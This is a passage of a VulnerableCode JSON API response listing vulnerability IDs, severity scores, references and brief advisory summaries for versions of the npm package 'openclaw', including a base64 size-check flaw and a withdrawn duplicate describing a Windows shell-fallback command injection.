snc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gk
yv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3
wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yh
pq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-3w6x-gv34-mqpf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pgdr-mvc3-2kg3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89157?format=json","vulnerability_id":"VCID-psms-gauf-tkbz","summary":"OpenClaw: Multiple Code Paths Missing Base64 Pre-Allocation Size Checks\n## Impact\n\nMultiple Code Paths Missing Base64 Pre-Allocation Size Checks.\n\nSeveral base64 decode paths could allocate before enforcing decoded-size limits.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=v2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42420","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16229","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16177","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1622","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42420"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-ccx3-fw7q-rr2r","reference_id":"","reference_type":"","scores
":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-ccx3-fw7q-rr2r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42420","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42420"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-base64-decoding-size-validation","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-base64-decoding-size-validation"},{"reference_url":"https://github.com/advisories/GHSA-ccx3-fw7q-rr2r","reference_id":"GHSA-ccx3-fw7q-rr2r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ccx3-fw7q-rr2r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":
"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":
"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42420","GHSA-ccx3-fw7q-rr2r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-psms-gauf-tkbz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91145?format=json","vulnerability_id":"VCID-q38j-b9g9-8yar","summary":"Duplicate Advisory: OpenClaw: WebSocket shared-auth connections could self-declare elevated scopes\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-7fcc-cw49-xm78. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to 2026.2.19 contain a command injection vulnerability in the Lobster extension tool execution that uses Windows shell fallback with shell: true after spawn failures. 
Attackers can inject shell metacharacters in command arguments to execute arbitrary commands when subprocess launch fails with EINVAL or ENOENT errors.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/ba7be018da354ea9f803ed356d20464df0437916","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ba7be018da354ea9f803ed356d20464df0437916"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-command-injection-via-windows-shell-fallback-in-lobster-tool-execution","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-command-injection-via-windows-shell-fallback-in-lobster-tool-execution"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32000","reference_id":"CVE-2026-32000","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:
X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32000"},{"reference_url":"https://github.com/advisories/GHSA-5rp4-cwgh-gvwq","reference_id":"GHSA-5rp4-cwgh-gvwq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5rp4-cwgh-gvwq"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7fcc-cw49-xm78","reference_id":"GHSA-7fcc-cw49-xm78","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7fcc-cw49-xm78"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"v
ulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"v
ulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"v
ulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VC